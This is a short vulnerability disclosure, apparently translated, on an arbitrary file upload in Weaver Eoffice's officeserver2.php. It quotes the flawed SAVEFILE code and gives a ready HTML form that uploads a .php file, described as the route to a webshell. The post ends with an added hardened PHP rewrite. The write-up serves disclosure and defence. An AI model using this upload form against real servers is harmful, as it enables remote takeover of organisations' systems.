泛微 (Weaver) Eoffice arbitrary file upload leading directly to getshell

2019-01-17  这是什么娃哈哈

Reference: https://bugs.shuimugan.com/bug/view?bug_no=125638

1. One file contains several arbitrary file upload points that lead directly to getshell. The relevant code is as follows:

    case "SAVEFILE" :
        $mRecordID = $RECORDID;
        $mUserName = $USERNAME;
        // FILENAME comes from the request and is used without any validation
        $mFileName = $FILENAME;
        $mFileType = $FILETYPE;
        $mDescript = $DESCRIPT;
        $mFileDate = $FileDate;
        // The destination path is built from the client-supplied name,
        // so the client decides the extension of the saved file
        $mFullPath = $mFilePath."/".$mFileName;
        if ( is_uploaded_file( $_FILES['MsgFileBody']['tmp_name'] ) )
        {
            if ( move_uploaded_file( $_FILES['MsgFileBody']['tmp_name'], $mFullPath ) )
            {
                $mFileSize = $_FILES['MsgFileBody']['size'];
                $result = true;
            }
            else
            {
                $MsgObj->MsgError( "Save File Error" );
                $result = false;
            }
        }

2. We need to construct a form.
OPTION is SAVEFILE, and FILENAME is the name the file is saved under, which can be chosen freely.

    <select>
      <option value ="volvo">SAVEFILE</option>
    </select>
    <form method='post' action='/iweboffice/officeserver2.php?OPTION=SAVEFILE&FILENAME=test.php' enctype="multipart/form-data">
      <input type="file" name="MsgFileBody" style="height:20px;BORDER: #8F908B 1px solid;"/><br><br>
      <button type=submit value="上传">上传</button>
    </form>

Uploading a one-line trojan (webshell) is then enough to obtain a webshell.
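
A hardened form of the SAVEFILE branch, as an added example that is not vendor code and not part of the original post: the client-supplied FILENAME is reduced to an allowlisted extension and the file is stored under a server-generated name. `UPLOAD_DIR`, `ALLOWED_EXT` and both function names are hypothetical, and PHP 7.1+ is assumed.

```php
<?php
// Added example, not vendor code. UPLOAD_DIR, ALLOWED_EXT and both function
// names are hypothetical; PHP 7.1+ is assumed.
const UPLOAD_DIR  = '/srv/eoffice-data/attachments'; // assumed: outside the web root
const ALLOWED_EXT = ['doc', 'docx', 'xls', 'xlsx', 'ppt', 'pptx', 'pdf'];

// Map a client-supplied FILENAME to a server-chosen storage name, or null to reject.
function safe_storage_name(string $clientName): ?string
{
    if ($clientName === '' || strpos($clientName, "\0") !== false) {
        return null;
    }
    // Only a bare file name is acceptable: no directory part, either slash style.
    if ($clientName !== basename(str_replace('\\', '/', $clientName))) {
        return null;
    }
    // Allowlist on the final extension; "test.php", "x.PHP5" and "a.php." all fail here.
    $ext = strtolower(pathinfo($clientName, PATHINFO_EXTENSION));
    if (!in_array($ext, ALLOWED_EXT, true)) {
        return null;
    }
    // The client's base name never reaches the disk, so "a.php.doc" is stored
    // as "<random>.doc" and existing files cannot be overwritten.
    return bin2hex(random_bytes(16)) . '.' . $ext;
}

// Replacement for the SAVEFILE body: $file is $_FILES['MsgFileBody'].
function save_uploaded_document(array $file, string $clientName): bool
{
    if (($file['error'] ?? UPLOAD_ERR_NO_FILE) !== UPLOAD_ERR_OK
        || !is_uploaded_file($file['tmp_name'])) {
        return false;
    }
    $name = safe_storage_name($clientName);
    if ($name === null) {
        return false;
    }
    return move_uploaded_file($file['tmp_name'], UPLOAD_DIR . '/' . $name);
}

// Constructed FILENAME values showing what the check accepts.
foreach (['report.docx', 'test.php', '../test.php', 'a.php.', 'x.PHP5', 'a.php.doc'] as $n) {
    printf("%-12s => %s\n", $n, safe_storage_name($n) === null ? 'rejected' : 'accepted');
}
```

The storage directory should additionally be configured so that the web server never hands files in it to the PHP interpreter.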
